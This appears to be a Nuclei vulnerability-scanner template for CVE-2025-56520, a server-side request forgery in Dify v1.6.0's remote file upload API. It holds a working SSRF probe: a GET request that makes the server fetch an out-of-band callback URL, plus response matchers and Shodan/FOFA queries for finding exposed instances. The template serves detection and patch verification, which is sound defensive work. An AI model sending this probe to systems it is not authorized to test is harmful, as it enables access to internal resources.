id: CVE-2025-56520 info: name: Dify v1.6.0 - Server-Side Request Forgery author: 0x_Akoko severity: high description: | Dify v1.6.0 contains a server side request forgery caused by improper validation in controllers.console.remote_files.RemoteFileUploadApi, letting attackers make arbitrary requests from the server, exploit requires network access. impact: | Attackers can make arbitrary requests from the server, potentially accessing internal resources or sensitive data. remediation: | Update to the latest version. reference: - https://github.com/langgenius/dify - https://dify.ai/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N cvss-score: 9.3 cve-id: CVE-2025-56520 epss-score: 0.00135 epss-percentile: 0.33086 cwe-id: CWE-918 metadata: verified: true max-request: 1 shodan-query: http.title:"Dify" fofa-query: title="Dify" tags: cve,cve2025,dify,ssrf,oast,oob,oss,vkev http: - raw: - | GET /console/api/remote-files/http%3A%2F%2F{{interactsh-url}}%2Ftest HTTP/1.1 Host: {{Hostname}} matchers-condition: and matchers: - type: word part: body words: - "file_type" - "file_length" condition: and - type: word part: content_type words: - "application/json" - type: word part: interactsh_protocol words: - "http" - "dns" condition: or - type: status status: - 200 # digest: 4a0a00473045022100ef9053686d55d148c028c497e925fe8fb138df5af48fcbe3f0bc73f20a9b257d022044c5ae8d932eb10c38e8a8f6502766860f8f622ace85cf6ba9e3156495c6b0bd:922c64590222798bb761d5b6d8e72950